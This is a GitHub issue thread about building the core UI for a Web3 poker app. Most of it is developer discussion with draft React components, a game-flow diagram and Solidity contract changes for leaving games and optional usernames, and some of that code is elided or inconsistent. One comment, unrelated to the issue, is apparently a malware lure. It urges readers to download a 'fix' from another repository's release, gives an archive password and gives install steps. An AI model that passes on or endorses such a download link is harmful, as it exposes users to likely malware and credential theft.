### ISSUE TITLE
Core User Interface Development

### ISSUE THREAD

**Issue by peterduhon** [peterduhon/skia-poker-morph#5]
### **\[SP-5 PRD1\] \- Core User Interface Development**

#### **Summary:**

Design and implement the core user interface components for Skia Poker, focusing on essential gameplay flows, wallet connection, and the game lobby. This phase is crucial for the MVP and must be completed before any advanced features are considered.

#### **Acceptance Criteria:**

* Wallet Connection: Securely connect Web3 wallets (MetaMask, Coinbase, Rainbow).  
* Game Lobby: Implement a functional game lobby where players can view available games, join a table, and see game details.  
* Poker Table: Create the basic poker table UI, enabling players to bet, fold, call, and raise.  
* Real-Time Updates: Ensure the UI reflects real-time changes in game state, player actions, and balances.  
* Responsive Design: The UI must be responsive across different devices and screen sizes.  
* Testing: Complete unit and integration testing to ensure the UI is robust and error-free.

#### **Tasks:**

5. **Design UI Mockups and Wireframes:** Develop mockups and wireframes for the core components.  
6. **Develop Wallet Connection UI:** Implement UI for wallet connection, including error handling.  
7. **Develop Game Lobby UI:** Create the game lobby interface, including search and filtering.  
8. **Develop Poker Table UI:** Implement the poker table layout and core gameplay actions.  
9. **Implement Real-Time Updates:** Ensure the UI reflects real-time updates using WebSocket or similar technology.  
10. **Responsive Design Implementation:** Ensure cross-device compatibility and adaptive layouts.  
11. **Testing and User Acceptance:** Conduct unit and integration tests, followed by user acceptance testing (UAT).  
12. **Final Review and Optimization:** Optimize the UI for performance and accessibility.

Assignee: buddyharshal
Due Date: 9/1

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by peterduhon** [comment]
Hi @tetyana-pol ,

I understand you're wondering how to apply the GameInterface component. Let me provide a comprehensive explanation, including a new GameTable component that should help with the UI implementation:

1. Application Structure:
   Your app structure should look like this:
   
   App
   ├── LandingPage (with Web3Auth login)
   └── GameInterface
       ├── GameTable
       └── PrivateMessaging

2. GameTable Component:
   First, let's create a basic GameTable component:

```jsx
import React from 'react';
import { Button } from '@/components/ui/button';

const GameTable = ({ playerAddress, opponentAddress, playerBalance, opponentBalance, communityCards, playerCards, onFold, onCheck, onBet }) => {
  return (
    <div className="relative w-full h-screen bg-green-800 text-white">
      {/* Opponent */}
      <div className="absolute top-4 left-1/2 transform -translate-x-1/2 text-center">
        <div className="w-20 h-20 bg-gray-400 rounded-full mx-auto mb-2"></div>
        <p>{opponentAddress}</p>
        <p>${opponentBalance}</p>
      </div>
      
      {/* Community Cards */}
      <div className="absolute top-1/2 left-1/2 transform -translate-x-1/2 -translate-y-1/2 flex space-x-2">
        {communityCards.map((card, index) => (
          <div key={index} className="w-16 h-24 bg-white rounded-lg border-2 border-black">
            {/* Render card */}
          </div>
        ))}
      </div>
      
      {/* Player */}
      <div className="absolute bottom-4 left-1/2 transform -translate-x-1/2 text-center">
        <p>{playerAddress}</p>
        <p>${playerBalance}</p>
        <div className="flex space-x-2 mt-2">
          {playerCards.map((card, index) => (
            <div key={index} className="w-16 h-24 bg-white rounded-lg border-2 border-black">
              {/* Render card */}
            </div>
          ))}
        </div>
      </div>
      
      {/* Actions */}
      <div className="absolute bottom-4 right-4 space-x-2">
        <Button className="bg-red-500 hover:bg-red-600" onClick={onFold}>Fold</Button>
        <Button className="bg-yellow-500 hover:bg-yellow-600" onClick={onCheck}>Check</Button>
        <Button className="bg-green-500 hover:bg-green-600" onClick={onBet}>Bet</Button>
      </div>
    </div>
  );
};

export default GameTable;

**Comment by peterduhon** [comment]
Updated GameInterface Component:
Now, let's update the GameInterface to use this GameTable:

import React, { useState, useEffect } from 'react';
import { ethers } from 'ethers';
import GameTable from './GameTable';
import PrivateMessaging from './PrivateMessaging';

const GameInterface = ({ web3Provider, gameContract, playerAddress }) => {
  const [signer, setSigner] = useState(null);
  const [opponent, setOpponent] = useState(null);
  const [gameState, setGameState] = useState({
    playerBalance: 0,
    opponentBalance: 0,
    communityCards: [],
    playerCards: [],
  });

  useEffect(() => {
    const setupSigner = async () => {
      if (web3Provider) {
        const signerInstance = web3Provider.getSigner();
        setSigner(signerInstance);
      }
    };

    const getOpponent = async () => {
      if (gameContract) {
        // Implement method to get opponent's address
        const opponentAddress = await gameContract.getOpponent(playerAddress);
        setOpponent(opponentAddress);
      }
    };

    const getGameState = async () => {
      if (gameContract) {
        // Implement methods to get game state from the contract
        const playerBalance = await gameContract.getBalance(playerAddress);
        const opponentBalance = await gameContract.getBalance(opponent);
        const communityCards = await gameContract.getCommunityCards();
        const playerCards = await gameContract.getPlayerCards(playerAddress);

        setGameState({
          playerBalance,
          opponentBalance,
          communityCards,
          playerCards,
        });
      }
    };

    setupSigner();
    getOpponent();
    getGameState();
  }, [web3Provider, gameContract, playerAddress]);

  const handleFold = async () => {
    await gameContract.fold();
  };

  const handleCheck = async () => {
    await gameContract.check();
  };

  const handleBet = async () => {
    // Implement betting logic
    await gameContract.bet(/* amount */);
  };

  if (!signer || !opponent) {
    return <div>Loading game interface...</div>;
  }

  return (
    <div className="game-interface">
      <GameTable
        playerAddress={playerAddress}
        opponentAddress={opponent}
        playerBalance={gameState.playerBalance}
        opponentBalance={gameState.opponentBalance}
        communityCards={gameState.communityCards}
        playerCards={gameState.playerCards}
        onFold={handleFold}
        onCheck={handleCheck}
        onBet={handleBet}
      />
      <div className="sidebar">
        <PrivateMessaging signer={signer} peerAddress={opponent} />
      </div>
    </div>
  );
};

export default GameInterface;

**Comment by peterduhon** [comment]
Using GameInterface in App.js:
Finally, use the GameInterface in your main App component:

import React, { useState, useEffect } from 'react';
import { Web3Auth } from "@web3auth/modal";
import { CHAIN_NAMESPACES } from "@web3auth/base";
import { ethers } from 'ethers';
import LandingPage from './components/LandingPage';
import GameInterface from './components/GameInterface';

const App = () => {
  const [web3auth, setWeb3auth] = useState(null);
  const [provider, setProvider] = useState(null);
  const [gameContract, setGameContract] = useState(null);
  const [playerAddress, setPlayerAddress] = useState(null);

  // ... (Web3Auth initialization code)

  const login = async () => {
    // ... (Login logic)
  };

  if (!web3auth) {
    return <div>Loading...</div>;
  }

  if (!provider) {
    return <LandingPage onLogin={login} />;
  }

  return (
    <GameInterface 
      web3Provider={provider}
      gameContract={gameContract}
      playerAddress={playerAddress}
    />
  );
};

export default App;

**Comment by peterduhon** [comment]
@tetyana-pol This structure provides a complete flow from the app's entry point to the game table UI. Remember to implement the actual contract interaction methods (like getOpponent, getBalance, etc.) based on @JW-dev0505  smart contract's structure.

**Comment by peterduhon** [comment]
@JW-dev0505 

Thanks for pointing out that users should be able to leave the game before it ends. We've updated the game flow to include this functionality. Here's the revised flow:

```mermaid
flowchart TD
    A[Landing Page] -->|Web3Auth| B[Wallet Connected]
    B --> C[User Registration]
    C --> D[Game Lobby]
    D -->|Create Game| E[Create Game Room]
    D -->|Join Game| F[Waiting Room]
    F -->|20 min wait| G[Game Table]
    G --> H[Game End]
    H --> I{Play Again?}
    I -->|Yes| D
    I -->|No| J[Exit Game]

    F -.->|Chat| K[XMTP Chat]
    G -.->|Play vs AI| L[AI Game]

    %% New leave game options
    F -->|Leave| M[Leave Game]
    G -->|Leave| M
    L -->|Leave| M
    M --> D

```

To implement this functionality, we need to make some changes to the smart contracts. Here are the specific updates you should make:

1. Update the `GameManagement` contract (`games.sol`):

Add a new function to handle players leaving the game:

```solidity
function leaveGame(uint256 _gameId) external {
    require(gameRooms[_gameId].id == _gameId, "Game room does not exist");
    require(gameRooms[_gameId].status == GameStatus.Waiting || gameRooms[_gameId].status == GameStatus.Active, "Game is not in progress");
    
    // Remove the player from the game
    for (uint256 i = 0; i < userGames[msg.sender].length; i++) {
        if (userGames[msg.sender][i] == _gameId) {
            userGames[msg.sender][i] = userGames[msg.sender][userGames[msg.sender].length - 1];
            userGames[msg.sender].pop();
            break;
        }
    }
    
    // If the game is still in the waiting state, return the buy-in amount to the player
    if (gameRooms[_gameId].status == GameStatus.Waiting) {
        // Call UserManagement contract to refund the buy-in amount
        UserManagement(userManagementAddress).updateBalance(msg.sender, gameRooms[_gameId].buyInAmount);
    }
    
    // If the game has started, handle forfeiting (you may want to adjust this logic based on your game rules)
    if (gameRooms[_gameId].status == GameStatus.Active) {
        // For simplicity, we're not returning any funds if the game has started
        // You might want to implement a more sophisticated logic here
    }
    
    // Check if there are any players left in the game
    if (getUserGames(_gameId).length == 0) {
        // If no players left, end the game
        gameRooms[_gameId].status = GameStatus.Completed;
    }
    
    emit PlayerLeftGame(_gameId, msg.sender);
}
```

Also, add a new event at the top of the contract:

```solidity
event PlayerLeftGame(uint256 indexed gameId, address indexed player);
```

2. Update the `UserManagement` contract (`users.sol`):

Add a new function to handle updating the user's balance when they leave a game:

```solidity
function refundBuyIn(address _user, uint256 _amount) external onlyRole(GAME_CONTRACT_ROLE) {
    require(users[_user].balance + _amount >= users[_user].balance, "Overflow error");
    users[_user].balance += _amount;
    emit BalanceUpdated(_user, users[_user].balance);
}
```

3. Update the `RoomManagement` contract (`rooms.sol`):

Add a new function to remove a player from a room:

```solidity
function removePlayer(uint256 roomId, address player) external onlyOwner {
    Room storage room = rooms[roomId];
    for (uint256 i = 0; i < room.players.length; i++) {
        if (room.players[i] == player) {
            room.players[i] = room.players[room.players.length - 1];
            room.players.pop();
            break;
        }
    }
    delete room.playerInfos[player];
    emit PlayerRemoved(roomId, player);
}
```

Also, add a new event at the top of the contract:

```solidity
event PlayerRemoved(uint256 roomId, address player);
```

These changes will allow players to leave the game at any time, handle the necessary updates to the game state, and manage the player's balance appropriately.

Remember to update your front-end components (Waiting Room and Game Table) to include the "Leave Game" button and implement the corresponding functionality to call these new smart contract functions when a player decides to leave the game.

Let me know if you need any clarification or have any questions about these updates!

**Comment by JW-dev0505** [comment]
@noema

Thank you for sharing player leaving implementation. Yeah, That was my mistake.
But we don't need to change GameManagement contract, because we manage games with below data in this contract.
```
struct GameRoom {
    uint256 id;
    address creator;
    uint256 buyInAmount;
    uint256 maxPlayers;
    uint256 createdAt;
    GameStatus status;
}
```
I will update Users.sol and Rooms.sol following your instructions and also consider updating other contracts related with player leaving. Thank you.

**Comment by peterduhon** [comment]
Updated RoomManagement Contract @JW-dev0505 

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "@openzeppelin/contracts/access/Ownable.sol";
import "./Common.sol";

contract RoomManagement is Ownable {
    // ... (existing code remains the same)

    event PlayerRemoved(uint256 roomId, address player);

    function removePlayer(uint256 roomId, address player) external onlyOwner {
        Room storage room = rooms[roomId];
        for (uint256 i = 0; i < room.players.length; i++) {
            if (room.players[i] == player) {
                room.players[i] = room.players[room.players.length - 1];
                room.players.pop();
                break;
            }
        }
        delete room.playerInfos[player];
        emit PlayerRemoved(roomId, player);
    }

    // ... (rest of the existing code remains the same)
}

**Comment by peterduhon** [comment]
Updated UserManagement Contract

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "@openzeppelin/contracts/access/Ownable.sol";
import "@openzeppelin/contracts/access/AccessControl.sol";
import "./Common.sol";

contract UserManagement is Ownable, AccessControl {
    // ... (existing code remains the same)

    function refundBuyIn(address _user, uint256 _amount) external onlyRole(GAME_CONTRACT_ROLE) {
        require(users[_user].balance + _amount >= users[_user].balance, "Overflow error");
        users[_user].balance += _amount;
        emit BalanceUpdated(_user, users[_user].balance);
    }

    // ... (rest of the existing code remains the same)
}

**Comment by JW-dev0505** [comment]
Thank you. Let me check them right now.

**Comment by peterduhon** [comment]
Thank you for your attentiveness! 🚀

**Comment by peterduhon** [comment]
@JW-dev0505 

These updates will allow:

Refunding the buy-in amount to a player when they leave a game that hasn't started yet.
Removing a player from a room when they leave.

To implement the full "leave game" functionality, you'll need to create a new function in your game logic contract (which interacts with these contracts) that does the following:

Check if the game has started.
If the game hasn't started:
a. Call removePlayer in the RoomManagement contract.
b. Call refundBuyIn in the UserManagement contract.
If the game has started:
a. Handle any game-specific logic (e.g., folding the player's hand).
b. Call removePlayer in the RoomManagement contract.
c. Update any game state as necessary.

Remember to ensure that only authorized contracts or addresses can call these new functions. You may need to set up appropriate permissions or create wrapper functions in a central game logic contract.
Is there anything else you'd like me to clarify or expand upon regarding these changes?

**Comment by JW-dev0505** [comment]
@noema

Thank you for letting me them.
I noticed refundBuyIn function is almost same as updateBalance which was existing on UserManagement contract.
I will follow the game logic you mentioned. Thank you.

**Comment by peterduhon** [comment]
Updated UserManagement Contract:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "@openzeppelin/contracts/access/Ownable.sol";
import "@openzeppelin/contracts/access/AccessControl.sol";
import "./Common.sol";

contract UserManagement is Ownable, AccessControl {
    bytes32 public constant GAME_CONTRACT_ROLE = keccak256("GAME_CONTRACT_ROLE");
    
    struct User {
        address userAddress;
        string username;
        uint256 balance;
        bool isRegistered;
    }

    mapping(address => User) public users;

    event UserRegistered(address indexed user, string username);
    event BalanceUpdated(address indexed user, uint256 newBalance);

    constructor() {
        _setupRole(GAME_CONTRACT_ROLE, msg.sender);
    }

    function registerUser(string calldata _username) external payable {
        require(bytes(_username).length > 0, "Username cannot be empty");
        require(!users[msg.sender].isRegistered, "User already registered");
        
        users[msg.sender] = User({
            userAddress: msg.sender,
            username: _username,
            balance: msg.value,
            isRegistered: true
        });

        emit UserRegistered(msg.sender, _username);
        emit BalanceUpdated(msg.sender, msg.value);
    }

    function isUserRegistered(address _user) external view returns (bool) {
        return users[_user].isRegistered;
    }

    function getUsernameOrAddress(address _user) external view returns (string memory) {
        if (users[_user].isRegistered) {
            return users[_user].username;
        } else {
            return addressToString(_user);
        }
    }

    function addressToString(address _addr) internal pure returns (string memory) {
        bytes32 value = bytes32(uint256(uint160(_addr)));
        bytes memory alphabet = "0123456789abcdef";
        bytes memory str = new bytes(42);
        str[0] = '0';
        str[1] = 'x';
        for (uint256 i = 0; i < 20; i++) {
            str[2+i*2] = alphabet[uint8(value[i + 12] >> 4)];
            str[3+i*2] = alphabet[uint8(value[i + 12] & 0x0f)];
        }
        return string(str);
    }

    // ... (rest of the existing functions)
}


Smart Contract Changes:

We need to modify the UserManagement contract to make username registration optional.
Add a function to check if a user has registered a username.
Modify game logic to handle both registered usernames and wallet addresses.


Frontend Changes:

Update the useWeb3 hook to fetch the balance from the Holesky testnet.
Implement logic to check user registration status after wallet connection.
Add UI for optional registration.


Game Logic Impact:

The game should now be able to handle players with both usernames and wallet addresses.
In the waiting room chat, users without usernames will be identified by their abbreviated wallet address.


Additional Considerations:

We may want to add an option for users to register or change their username later from a settings page.
Consider adding a tooltip or info box explaining the benefits of registering a username (e.g., easier identification in chat, better user experience).



Here's a summary of the changes needed in our smart contracts:

Update UserManagement.sol:
These changes allow for optional user registration while still providing a way to identify users in the game, either by their chosen username or their wallet address.
To implement this fully, you'll need to:

Update the frontend to use these new contract functions.
Modify the game logic to handle both registered and unregistered users.
Update the waiting room chat to use the getUsernameOrAddress function when displaying user identities.
Ensure that the balance displayed in the lobby is fetched from the Holesky testnet.

This approach provides flexibility for users while still maintaining the functionality needed for the game logic and chat features. It also sets up a structure that can be easily extended if you want to add more user-related features in the future.

**Comment by peterduhon** [comment]
### Global State Management:

Address and web3 should be in a global state. This can be achieved using React's Context API or a state management library like Redux.

**Quick solution:** Create a context for Web3 and address:

```
// Web3Context.js
import React, { createContext, useState, useContext } from 'react';

const Web3Context = createContext();

export const Web3Provider = ({ children }) => {
  const [web3, setWeb3] = useState(null);
  const [address, setAddress] = useState('');

  return (
    <Web3Context.Provider value={{ web3, setWeb3, address, setAddress }}>
      {children}
    </Web3Context.Provider>
  );
};

export const useWeb3 = () => useContext(Web3Context);
```
Wrap your app with this provider and use the useWeb3 hook in components.
